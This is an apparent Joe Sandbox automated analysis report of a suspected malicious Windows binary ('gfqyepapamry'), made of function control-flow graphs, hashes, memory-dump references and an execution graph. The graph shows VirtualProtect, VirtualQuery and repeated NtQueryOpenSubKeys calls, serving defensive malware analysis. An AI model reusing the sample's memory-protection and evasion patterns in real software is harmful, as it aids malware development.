                                                      control_flow_graph 306 7ff7938d1e10-7ff7938d1e2d 307 7ff7938d1e2f-7ff7938d1e38 306->307 308 7ff7938d1e3e-7ff7938d1e48 306->308 307->308 309 7ff7938d1f60-7ff7938d1f69 307->309 310 7ff7938d1ea3-7ff7938d1ea8 308->310 311 7ff7938d1e4a-7ff7938d1e53 308->311 310->309 314 7ff7938d1eae-7ff7938d1eb3 310->314 312 7ff7938d1e55-7ff7938d1e60 311->312 313 7ff7938d1ecc-7ff7938d1ed1 311->313 312->310 315 7ff7938d1f23-7ff7938d1f2d 313->315 316 7ff7938d1ed3-7ff7938d1ee2 signal 313->316 317 7ff7938d1eb5-7ff7938d1eba 314->317 318 7ff7938d1efb-7ff7938d1f0a call 7ff7938d9f00 314->318 321 7ff7938d1f43-7ff7938d1f45 315->321 322 7ff7938d1f2f-7ff7938d1f3f 315->322 316->315 319 7ff7938d1ee4-7ff7938d1ee8 316->319 317->309 323 7ff7938d1ec0 317->323 318->315 327 7ff7938d1f0c-7ff7938d1f10 318->327 324 7ff7938d1f4e-7ff7938d1f53 319->324 325 7ff7938d1eea-7ff7938d1ef9 signal 319->325 321->309 322->321 323->315 328 7ff7938d1f5a 324->328 325->309 329 7ff7938d1f55 327->329 330 7ff7938d1f12-7ff7938d1f21 signal 327->330 328->309 329->328 330->309
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000028.00000002.295206069460.00007FF7938D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7938D0000, based on PE: true
                                                      • Associated: 00000028.00000002.295206038588.00007FF7938D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206105456.00007FF7938DA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206162311.00007FF7938DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206669921.00007FF793B5C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206700019.00007FF793B5F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_40_2_7ff7938d0000_gfqyepapamry.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CCG
                                                      • API String ID: 0-1584390748
                                                      • Opcode ID: 5bf2a717babe67286cc28164b55208dcf2e1e4bf3b98298b469c0392ec4956c6
                                                      • Instruction ID: a88f6f02eee5cc448200fb23c87d6f648b0e7477794da6e678b6efb57285ae58
                                                      • Opcode Fuzzy Hash: 5bf2a717babe67286cc28164b55208dcf2e1e4bf3b98298b469c0392ec4956c6
                                                      • Instruction Fuzzy Hash: 2421E221F0C10643FBF57274D590B79918ADF85764FA88531D92D6B3DACE2EACA18331
                                                      Function 00007FF7938D38E0 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000028.00000002.295206069460.00007FF7938D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7938D0000, based on PE: true
                                                      • Associated: 00000028.00000002.295206038588.00007FF7938D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206105456.00007FF7938DA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206162311.00007FF7938DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206669921.00007FF793B5C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206700019.00007FF793B5F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_40_2_7ff7938d0000_gfqyepapamry.jbxd
                                                      Similarity
                                                      • API ID: wcslen
                                                      • String ID: 0$@
                                                      • API String ID: 4088430540-1545510068
                                                      • Opcode ID: 85d4a47882fd244ccb9d3f56351bc1e2e205bbf85242396c7daddac1748bd7a5
                                                      • Instruction ID: ba844318856a23b5670dc65720ff1906752b465f64ad970e5525a3d994524b63
                                                      • Opcode Fuzzy Hash: 85d4a47882fd244ccb9d3f56351bc1e2e205bbf85242396c7daddac1748bd7a5
                                                      • Instruction Fuzzy Hash: 47116D2252868182E7A0DB24F445B9AA378EFD4394F905124F68D83B68EF7EC156CB10
                                                      Function 00007FF7938D1880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 339 7ff7938d1880-7ff7938d189c 340 7ff7938d1a0f-7ff7938d1a1f 339->340 341 7ff7938d18a2-7ff7938d18f9 call 7ff7938d2420 call 7ff7938d2660 339->341 341->340 346 7ff7938d18ff-7ff7938d1910 341->346 347 7ff7938d1912-7ff7938d191c 346->347 348 7ff7938d193e-7ff7938d1941 346->348 349 7ff7938d194d-7ff7938d1954 347->349 350 7ff7938d191e-7ff7938d1929 347->350 348->349 351 7ff7938d1943-7ff7938d1947 348->351 354 7ff7938d1956-7ff7938d1961 349->354 355 7ff7938d199e-7ff7938d19a6 349->355 350->349 352 7ff7938d192b-7ff7938d193a 350->352 351->349 353 7ff7938d1a20-7ff7938d1a26 351->353 352->348 357 7ff7938d1a2c-7ff7938d1a37 353->357 358 7ff7938d1b87-7ff7938d1b98 call 7ff7938d1d40 353->358 359 7ff7938d1970-7ff7938d199c call 7ff7938d1ba0 354->359 355->340 356 7ff7938d19a8-7ff7938d19c1 355->356 361 7ff7938d19df-7ff7938d19e7 356->361 357->355 362 7ff7938d1a3d-7ff7938d1a5f 357->362 359->355 366 7ff7938d19d0-7ff7938d19dd 361->366 367 7ff7938d19e9-7ff7938d1a0d VirtualProtect 361->367 368 7ff7938d1a7d-7ff7938d1a97 362->368 366->340 366->361 367->366 371 7ff7938d1a70-7ff7938d1a77 367->371 369 7ff7938d1b74-7ff7938d1b82 call 7ff7938d1d40 368->369 370 7ff7938d1a9d-7ff7938d1afa 368->370 369->358 376 7ff7938d1b22-7ff7938d1b26 370->376 377 7ff7938d1afc-7ff7938d1b0e 370->377 371->355 371->368 376->371 380 7ff7938d1b2c-7ff7938d1b30 376->380 378 7ff7938d1b10-7ff7938d1b20 377->378 379 7ff7938d1b5c-7ff7938d1b6f call 7ff7938d1d40 377->379 378->376 378->379 379->369 380->371 381 7ff7938d1b36-7ff7938d1b53 call 7ff7938d1ba0 380->381 381->379
                                                      APIs
                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7938D1247), ref: 00007FF7938D19F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000028.00000002.295206069460.00007FF7938D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7938D0000, based on PE: true
                                                      • Associated: 00000028.00000002.295206038588.00007FF7938D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206105456.00007FF7938DA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206162311.00007FF7938DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206669921.00007FF793B5C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206700019.00007FF793B5F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_40_2_7ff7938d0000_gfqyepapamry.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                      • API String ID: 544645111-395989641
                                                      • Opcode ID: 624d886e0a2956385a3aa82a1c32ecec343fb83b6217246dc268823a2cc0203b
                                                      • Instruction ID: be68a6664a85a6c6ebf48cb94fcf268e79d4a8de8e8826328bfa21658725410b
                                                      • Opcode Fuzzy Hash: 624d886e0a2956385a3aa82a1c32ecec343fb83b6217246dc268823a2cc0203b
                                                      • Instruction Fuzzy Hash: F0519021E08542E6EBE0AB72D840B74B76AAF44B94FD44131D92D27794CF3EE8A1C731
                                                      Function 00007FF7938D1800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 385 7ff7938d1800-7ff7938d1810 386 7ff7938d1824 385->386 387 7ff7938d1812-7ff7938d1822 385->387 388 7ff7938d182b-7ff7938d1867 call 7ff7938d2290 fprintf 386->388 387->388
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000028.00000002.295206069460.00007FF7938D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7938D0000, based on PE: true
                                                      • Associated: 00000028.00000002.295206038588.00007FF7938D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206105456.00007FF7938DA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206162311.00007FF7938DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206669921.00007FF793B5C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206700019.00007FF793B5F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_40_2_7ff7938d0000_gfqyepapamry.jbxd
                                                      Similarity
                                                      • API ID: fprintf
                                                      • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                      • API String ID: 383729395-3474627141
                                                      • Opcode ID: 7aa696c5338f06f51365a9fea6672589191880a4652d9327b4d132423833f54a
                                                      • Instruction ID: e3dbe96fde5eac1914e6979b2f23a3eb3ef449b0e34101c9c8009432a5b39d9d
                                                      • Opcode Fuzzy Hash: 7aa696c5338f06f51365a9fea6672589191880a4652d9327b4d132423833f54a
                                                      • Instruction Fuzzy Hash: 81F0C211E08A4582E6B1FB34A9418B9E369EF4A3C1F909231EE5E73251DF2DF192C330
                                                      Function 00007FF7938D219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000028.00000002.295206069460.00007FF7938D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7938D0000, based on PE: true
                                                      • Associated: 00000028.00000002.295206038588.00007FF7938D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206105456.00007FF7938DA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206162311.00007FF7938DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206669921.00007FF793B5C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206700019.00007FF793B5F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_40_2_7ff7938d0000_gfqyepapamry.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                      • String ID:
                                                      • API String ID: 682475483-0
                                                      • Opcode ID: d45a9a9716b8fea24e24f210a165b038e320887715f174ec21bcecc5c3d205a7
                                                      • Instruction ID: ed3343f24e153e4e2449d0ebda4090b58b3d361d1c3e5a4c0b9fd6bfc94537a1
                                                      • Opcode Fuzzy Hash: d45a9a9716b8fea24e24f210a165b038e320887715f174ec21bcecc5c3d205a7
                                                      • Instruction Fuzzy Hash: 8F011E25A0D60281FAA6AB71AD04634D368BF44B91FC44032C92D77694DF2EF8618330

                                                      Execution Graph

                                                      Execution Coverage:2.4%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:829
                                                      Total number of Limit Nodes:2
                                                      execution_graph 2830 140001ac3 2831 140001a70 2830->2831 2832 14000199e 2831->2832 2833 140001b36 2831->2833 2836 140001b53 2831->2836 2835 140001a0f 2832->2835 2837 1400019e9 VirtualProtect 2832->2837 2834 140001ba0 4 API calls 2833->2834 2834->2836 2837->2832 1998 140001ae4 1999 140001a70 1998->1999 2000 14000199e 1999->2000 2001 140001b36 1999->2001 2004 140001b53 1999->2004 2003 140001a0f 2000->2003 2005 1400019e9 VirtualProtect 2000->2005 2006 140001ba0 2001->2006 2005->2000 2008 140001bc2 2006->2008 2007 140001c04 memcpy 2007->2004 2008->2007 2010 140001c45 VirtualQuery 2008->2010 2011 140001cf4 2008->2011 2010->2011 2015 140001c72 2010->2015 2012 140001d23 GetLastError 2011->2012 2013 140001d37 2012->2013 2014 140001ca4 VirtualProtect 2014->2007 2014->2012 2015->2007 2015->2014 2038 140001404 2111 140001394 2038->2111 2040 140001413 2041 140001394 2 API calls 2040->2041 2042 140001422 2041->2042 2043 140001394 2 API calls 2042->2043 2044 140001431 2043->2044 2045 140001394 2 API calls 2044->2045 2046 140001440 2045->2046 2047 140001394 2 API calls 2046->2047 2048 14000144f 2047->2048 2049 140001394 2 API calls 2048->2049 2050 14000145e 2049->2050 2051 140001394 2 API calls 2050->2051 2052 14000146d 2051->2052 2053 140001394 2 API calls 2052->2053 2054 14000147c 2053->2054 2055 140001394 2 API calls 2054->2055 2056 14000148b 2055->2056 2057 140001394 2 API calls 2056->2057 2058 14000149a 2057->2058 2059 140001394 2 API calls 2058->2059 2060 1400014a9 2059->2060 2061 140001394 2 API calls 2060->2061 2062 1400014b8 2061->2062 2063 140001394 2 API calls 2062->2063 2064 1400014c7 2063->2064 2065 140001394 2 API calls 2064->2065 2066 1400014d6 2065->2066 2067 1400014e5 2066->2067 2068 140001394 2 API calls 2066->2068 2069 140001394 2 API calls 2067->2069 2068->2067 2070 1400014ef 2069->2070 2071 1400014f4 2070->2071 2072 140001394 2 API calls 2070->2072 2073 140001394 2 API calls 2071->2073 2072->2071 2074 1400014fe 2073->2074 2075 140001503 2074->2075 2076 140001394 2 API calls 2074->2076 2077 140001394 2 API calls 2075->2077 2076->2075 2078 14000150d 2077->2078 2079 140001394 2 API calls 2078->2079 2080 140001512 2079->2080 2081 140001394 2 API calls 2080->2081 2082 140001521 2081->2082 2083 140001394 2 API calls 2082->2083 2084 140001530 2083->2084 2085 140001394 2 API calls 2084->2085 2086 14000153f 2085->2086 2087 140001394 2 API calls 2086->2087 2088 14000154e 2087->2088 2089 140001394 2 API calls 2088->2089 2090 14000155d 2089->2090 2091 140001394 2 API calls 2090->2091 2092 14000156c 2091->2092 2093 140001394 2 API calls 2092->2093 2094 14000157b 2093->2094 2095 140001394 2 API calls 2094->2095 2096 14000158a 2095->2096 2097 140001394 2 API calls 2096->2097 2098 140001599 2097->2098 2099 140001394 2 API calls 2098->2099 2100 1400015a8 2099->2100 2101 140001394 2 API calls 2100->2101 2102 1400015b7 2101->2102 2103 140001394 2 API calls 2102->2103 2104 1400015c6 2103->2104 2105 140001394 2 API calls 2104->2105 2106 1400015d5 2105->2106 2107 140001394 2 API calls 2106->2107 2108 1400015e4 2107->2108 2109 140001394 2 API calls 2108->2109 2110 1400015f3 2109->2110 2112 140005a60 malloc 2111->2112 2113 1400013b8 2112->2113 2114 1400013c6 NtQueryOpenSubKeys 2113->2114 2114->2040 2115 140002104 2116 140002111 EnterCriticalSection 2115->2116 2117 140002218 2115->2117 2118 14000220b LeaveCriticalSection 2116->2118 2122 14000212e 2116->2122 2119 140002272 2117->2119 2121 140002241 DeleteCriticalSection 2117->2121 2118->2117 2120 14000214d TlsGetValue GetLastError 2120->2122 2121->2119 2122->2118 2122->2120 2016 14000216f 2017 140002185 2016->2017 2018 140002178 InitializeCriticalSection 2016->2018 2018->2017 2019 140001a70 2020 14000199e 2019->2020 2024 140001a7d 2019->2024 2021 140001a0f 2020->2021 2022 1400019e9 VirtualProtect 2020->2022 2022->2020 2023 140001b53 2024->2019 2024->2023 2025 140001b36 2024->2025 2026 140001ba0 4 API calls 2025->2026 2026->2023 2838 140002050 2839 14000205e EnterCriticalSection 2838->2839 2840 1400020cf 2838->2840 2841 1400020c2 LeaveCriticalSection 2839->2841 2842 140002079 2839->2842 2841->2840 2842->2841 2843 140001fd0 2844 140001fe4 2843->2844 2845 140002033 2843->2845 2844->2845 2846 140001ffd EnterCriticalSection LeaveCriticalSection 2844->2846 2846->2845 2131 140001ab3 2132 140001a70 2131->2132 2132->2131 2133 14000199e 2132->2133 2134 140001b36 2132->2134 2137 140001b53 2132->2137 2136 140001a0f 2133->2136 2138 1400019e9 VirtualProtect 2133->2138 2135 140001ba0 4 API calls 2134->2135 2135->2137 2138->2133 1988 140001394 1992 140005a60 1988->1992 1990 1400013b8 1991 1400013c6 NtQueryOpenSubKeys 1990->1991 1993 140005a7e 1992->1993 1996 140005aab 1992->1996 1993->1990 1994 140005b53 1995 140005b6f malloc 1994->1995 1997 140005b90 1995->1997 1996->1993 1996->1994 1997->1993 2123 14000219e 2124 140002272 2123->2124 2125 1400021ab EnterCriticalSection 2123->2125 2126 140002265 LeaveCriticalSection 2125->2126 2128 1400021c8 2125->2128 2126->2124 2127 1400021e9 TlsGetValue GetLastError 2127->2128 2128->2126 2128->2127 2027 140001800 2028 140001812 2027->2028 2029 140001835 fprintf 2028->2029 2030 140001000 2031 14000108b __set_app_type 2030->2031 2032 140001040 2030->2032 2034 1400010b6 2031->2034 2032->2031 2033 1400010e5 2034->2033 2036 140001e00 2034->2036 2037 140005ff0 __setusermatherr 2036->2037 2129 140002320 strlen 2130 140002337 2129->2130 2139 140001140 2142 140001160 2139->2142 2141 140001156 2143 1400011b9 2142->2143 2144 14000118b 2142->2144 2145 1400011d3 2143->2145 2146 1400011c7 _amsg_exit 2143->2146 2144->2143 2147 1400011a0 Sleep 2144->2147 2148 140001201 _initterm 2145->2148 2149 14000121a 2145->2149 2146->2145 2147->2143 2147->2144 2148->2149 2165 140001880 2149->2165 2152 14000126a 2153 14000126f malloc 2152->2153 2154 14000128b 2153->2154 2156 1400012d0 2153->2156 2155 1400012a0 strlen malloc memcpy 2154->2155 2155->2155 2155->2156 2176 140003150 2156->2176 2158 140001315 2159 140001344 2158->2159 2160 140001324 2158->2160 2163 140001160 50 API calls 2159->2163 2161 140001338 2160->2161 2162 14000132d _cexit 2160->2162 2161->2141 2162->2161 2164 140001366 2163->2164 2164->2141 2166 140001247 SetUnhandledExceptionFilter 2165->2166 2167 1400018a2 2165->2167 2166->2152 2167->2166 2168 14000194d 2167->2168 2172 140001a20 2167->2172 2169 14000199e 2168->2169 2170 140001ba0 4 API calls 2168->2170 2169->2166 2171 1400019e9 VirtualProtect 2169->2171 2170->2168 2171->2169 2172->2169 2173 140001b53 2172->2173 2174 140001b36 2172->2174 2175 140001ba0 4 API calls 2174->2175 2175->2173 2179 140003166 2176->2179 2177 140003291 wcslen 2250 14000153f 2177->2250 2179->2177 2181 14000348e 2181->2158 2187 14000338c 2188 140003434 wcslen 2187->2188 2189 14000344a 2188->2189 2191 14000348c 2188->2191 2189->2191 2192 140003476 wcslen 2189->2192 2190 140003551 wcscpy wcscat 2194 140003583 2190->2194 2191->2190 2192->2189 2192->2191 2193 1400035d3 wcscpy wcscat 2196 140003609 2193->2196 2194->2193 2195 14000371e wcscpy wcscat 2197 140003757 2195->2197 2196->2195 2198 140003aab wcslen 2197->2198 2199 140003ab9 2198->2199 2200 140003aeb 2198->2200 2199->2200 2202 140003ad6 wcslen 2199->2202 2201 140003bfa wcscpy wcscat 2200->2201 2204 140003c2f 2201->2204 2202->2199 2202->2200 2203 140003c7f wcscpy wcscat 2206 140003cb8 2203->2206 2204->2203 2205 140003cf5 wcscpy wcscat 2208 140003d3c 2205->2208 2206->2205 2207 140003d8e wcscpy wcscat wcslen 2390 14000146d 2207->2390 2208->2207 2213 140003ea5 2476 1400014a9 2213->2476 2214 140003fe8 2216 14000145e 2 API calls 2214->2216 2223 140003f3c 2216->2223 2218 140003fd7 2220 14000145e 2 API calls 2218->2220 2219 1400056e7 2220->2223 2222 14000407a wcscpy wcscat wcslen 2235 140004150 2222->2235 2223->2219 2223->2222 2226 140003f30 2227 14000145e 2 API calls 2226->2227 2227->2223 2228 140004245 wcslen 2229 14000153f 2 API calls 2228->2229 2229->2235 2230 14000530a memcpy 2230->2235 2231 14000443b wcslen 2637 14000157b 2231->2637 2232 1400046ad wcslen 2233 14000153f 2 API calls 2232->2233 2233->2235 2235->2228 2235->2230 2235->2231 2235->2232 2236 140004fa1 wcscpy wcscat wcslen 2235->2236 2239 140004533 wcslen 2235->2239 2242 1400050e3 2235->2242 2243 14000546c memcpy 2235->2243 2244 1400026e0 9 API calls 2235->2244 2245 14000518e wcslen 2235->2245 2247 140004df5 wcscpy wcscat wcslen 2235->2247 2249 14000145e NtQueryOpenSubKeys malloc 2235->2249 2592 1400014d6 2235->2592 2665 140001521 2235->2665 2763 140001431 2235->2763 2237 140001422 2 API calls 2236->2237 2237->2235 2654 1400015a8 2239->2654 2242->2158 2243->2235 2244->2235 2246 1400015a8 2 API calls 2245->2246 2246->2235 2694 140001422 2247->2694 2249->2235 2251 140001394 2 API calls 2250->2251 2252 14000154e 2251->2252 2253 140001394 2 API calls 2252->2253 2254 14000155d 2253->2254 2255 140001394 2 API calls 2254->2255 2256 14000156c 2255->2256 2257 140001394 2 API calls 2256->2257 2258 14000157b 2257->2258 2259 140001394 2 API calls 2258->2259 2260 14000158a 2259->2260 2261 140001394 2 API calls 2260->2261 2262 140001599 2261->2262 2263 140001394 2 API calls 2262->2263 2264 1400015a8 2263->2264 2265 140001394 2 API calls 2264->2265 2266 1400015b7 2265->2266 2267 140001394 2 API calls 2266->2267 2268 1400015c6 2267->2268 2269 140001394 2 API calls 2268->2269 2270 1400015d5 2269->2270 2271 140001394 2 API calls 2270->2271 2272 1400015e4 2271->2272 2273 140001394 2 API calls 2272->2273 2274 1400015f3 2273->2274 2274->2181 2275 140001503 2274->2275 2276 140001394 2 API calls 2275->2276 2277 14000150d 2276->2277 2278 140001394 2 API calls 2277->2278 2279 140001512 2278->2279 2280 140001394 2 API calls 2279->2280 2281 140001521 2280->2281 2282 140001394 2 API calls 2281->2282 2283 140001530 2282->2283 2284 140001394 2 API calls 2283->2284 2285 14000153f 2284->2285 2286 140001394 2 API calls 2285->2286 2287 14000154e 2286->2287 2288 140001394 2 API calls 2287->2288 2289 14000155d 2288->2289 2290 140001394 2 API calls 2289->2290 2291 14000156c 2290->2291 2292 140001394 2 API calls 2291->2292 2293 14000157b 2292->2293 2294 140001394 2 API calls 2293->2294 2295 14000158a 2294->2295 2296 140001394 2 API calls 2295->2296 2297 140001599 2296->2297 2298 140001394 2 API calls 2297->2298 2299 1400015a8 2298->2299 2300 140001394 2 API calls 2299->2300 2301 1400015b7 2300->2301 2302 140001394 2 API calls 2301->2302 2303 1400015c6 2302->2303 2304 140001394 2 API calls 2303->2304 2305 1400015d5 2304->2305 2306 140001394 2 API calls 2305->2306 2307 1400015e4 2306->2307 2308 140001394 2 API calls 2307->2308 2309 1400015f3 2308->2309 2309->2187 2310 14000156c 2309->2310 2311 140001394 2 API calls 2310->2311 2312 14000157b 2311->2312 2313 140001394 2 API calls 2312->2313 2314 14000158a 2313->2314 2315 140001394 2 API calls 2314->2315 2316 140001599 2315->2316 2317 140001394 2 API calls 2316->2317 2318 1400015a8 2317->2318 2319 140001394 2 API calls 2318->2319 2320 1400015b7 2319->2320 2321 140001394 2 API calls 2320->2321 2322 1400015c6 2321->2322 2323 140001394 2 API calls 2322->2323 2324 1400015d5 2323->2324 2325 140001394 2 API calls 2324->2325 2326 1400015e4 2325->2326 2327 140001394 2 API calls 2326->2327 2328 1400015f3 2327->2328 2328->2187 2329 14000145e 2328->2329 2330 140001394 2 API calls 2329->2330 2331 14000146d 2330->2331 2332 140001394 2 API calls 2331->2332 2333 14000147c 2332->2333 2334 140001394 2 API calls 2333->2334 2335 14000148b 2334->2335 2336 140001394 2 API calls 2335->2336 2337 14000149a 2336->2337 2338 140001394 2 API calls 2337->2338 2339 1400014a9 2338->2339 2340 140001394 2 API calls 2339->2340 2341 1400014b8 2340->2341 2342 140001394 2 API calls 2341->2342 2343 1400014c7 2342->2343 2344 140001394 2 API calls 2343->2344 2345 1400014d6 2344->2345 2346 1400014e5 2345->2346 2347 140001394 2 API calls 2345->2347 2348 140001394 2 API calls 2346->2348 2347->2346 2349 1400014ef 2348->2349 2350 1400014f4 2349->2350 2351 140001394 2 API calls 2349->2351 2352 140001394 2 API calls 2350->2352 2351->2350 2353 1400014fe 2352->2353 2354 140001503 2353->2354 2355 140001394 2 API calls 2353->2355 2356 140001394 2 API calls 2354->2356 2355->2354 2357 14000150d 2356->2357 2358 140001394 2 API calls 2357->2358 2359 140001512 2358->2359 2360 140001394 2 API calls 2359->2360 2361 140001521 2360->2361 2362 140001394 2 API calls 2361->2362 2363 140001530 2362->2363 2364 140001394 2 API calls 2363->2364 2365 14000153f 2364->2365 2366 140001394 2 API calls 2365->2366 2367 14000154e 2366->2367 2368 140001394 2 API calls 2367->2368 2369 14000155d 2368->2369 2370 140001394 2 API calls 2369->2370 2371 14000156c 2370->2371 2372 140001394 2 API calls 2371->2372 2373 14000157b 2372->2373 2374 140001394 2 API calls 2373->2374 2375 14000158a 2374->2375 2376 140001394 2 API calls 2375->2376 2377 140001599 2376->2377 2378 140001394 2 API calls 2377->2378 2379 1400015a8 2378->2379 2380 140001394 2 API calls 2379->2380 2381 1400015b7 2380->2381 2382 140001394 2 API calls 2381->2382 2383 1400015c6 2382->2383 2384 140001394 2 API calls 2383->2384 2385 1400015d5 2384->2385 2386 140001394 2 API calls 2385->2386 2387 1400015e4 2386->2387 2388 140001394 2 API calls 2387->2388 2389 1400015f3 2388->2389 2389->2187 2391 140001394 2 API calls 2390->2391 2392 14000147c 2391->2392 2393 140001394 2 API calls 2392->2393 2394 14000148b 2393->2394 2395 140001394 2 API calls 2394->2395 2396 14000149a 2395->2396 2397 140001394 2 API calls 2396->2397 2398 1400014a9 2397->2398 2399 140001394 2 API calls 2398->2399 2400 1400014b8 2399->2400 2401 140001394 2 API calls 2400->2401 2402 1400014c7 2401->2402 2403 140001394 2 API calls 2402->2403 2404 1400014d6 2403->2404 2405 1400014e5 2404->2405 2406 140001394 2 API calls 2404->2406 2407 140001394 2 API calls 2405->2407 2406->2405 2408 1400014ef 2407->2408 2409 1400014f4 2408->2409 2410 140001394 2 API calls 2408->2410 2411 140001394 2 API calls 2409->2411 2410->2409 2412 1400014fe 2411->2412 2413 140001503 2412->2413 2414 140001394 2 API calls 2412->2414 2415 140001394 2 API calls 2413->2415 2414->2413 2416 14000150d 2415->2416 2417 140001394 2 API calls 2416->2417 2418 140001512 2417->2418 2419 140001394 2 API calls 2418->2419 2420 140001521 2419->2420 2421 140001394 2 API calls 2420->2421 2422 140001530 2421->2422 2423 140001394 2 API calls 2422->2423 2424 14000153f 2423->2424 2425 140001394 2 API calls 2424->2425 2426 14000154e 2425->2426 2427 140001394 2 API calls 2426->2427 2428 14000155d 2427->2428 2429 140001394 2 API calls 2428->2429 2430 14000156c 2429->2430 2431 140001394 2 API calls 2430->2431 2432 14000157b 2431->2432 2433 140001394 2 API calls 2432->2433 2434 14000158a 2433->2434 2435 140001394 2 API calls 2434->2435 2436 140001599 2435->2436 2437 140001394 2 API calls 2436->2437 2438 1400015a8 2437->2438 2439 140001394 2 API calls 2438->2439 2440 1400015b7 2439->2440 2441 140001394 2 API calls 2440->2441 2442 1400015c6 2441->2442 2443 140001394 2 API calls 2442->2443 2444 1400015d5 2443->2444 2445 140001394 2 API calls 2444->2445 2446 1400015e4 2445->2446 2447 140001394 2 API calls 2446->2447 2448 1400015f3 2447->2448 2448->2223 2449 140001530 2448->2449 2450 140001394 2 API calls 2449->2450 2451 14000153f 2450->2451 2452 140001394 2 API calls 2451->2452 2453 14000154e 2452->2453 2454 140001394 2 API calls 2453->2454 2455 14000155d 2454->2455 2456 140001394 2 API calls 2455->2456 2457 14000156c 2456->2457 2458 140001394 2 API calls 2457->2458 2459 14000157b 2458->2459 2460 140001394 2 API calls 2459->2460 2461 14000158a 2460->2461 2462 140001394 2 API calls 2461->2462 2463 140001599 2462->2463 2464 140001394 2 API calls 2463->2464 2465 1400015a8 2464->2465 2466 140001394 2 API calls 2465->2466 2467 1400015b7 2466->2467 2468 140001394 2 API calls 2467->2468 2469 1400015c6 2468->2469 2470 140001394 2 API calls 2469->2470 2471 1400015d5 2470->2471 2472 140001394 2 API calls 2471->2472 2473 1400015e4 2472->2473 2474 140001394 2 API calls 2473->2474 2475 1400015f3 2474->2475 2475->2213 2475->2214 2477 140001394 2 API calls 2476->2477 2478 1400014b8 2477->2478 2479 140001394 2 API calls 2478->2479 2480 1400014c7 2479->2480 2481 140001394 2 API calls 2480->2481 2482 1400014d6 2481->2482 2483 1400014e5 2482->2483 2484 140001394 2 API calls 2482->2484 2485 140001394 2 API calls 2483->2485 2484->2483 2486 1400014ef 2485->2486 2487 1400014f4 2486->2487 2488 140001394 2 API calls 2486->2488 2489 140001394 2 API calls 2487->2489 2488->2487 2490 1400014fe 2489->2490 2491 140001503 2490->2491 2492 140001394 2 API calls 2490->2492 2493 140001394 2 API calls 2491->2493 2492->2491 2494 14000150d 2493->2494 2495 140001394 2 API calls 2494->2495 2496 140001512 2495->2496 2497 140001394 2 API calls 2496->2497 2498 140001521 2497->2498 2499 140001394 2 API calls 2498->2499 2500 140001530 2499->2500 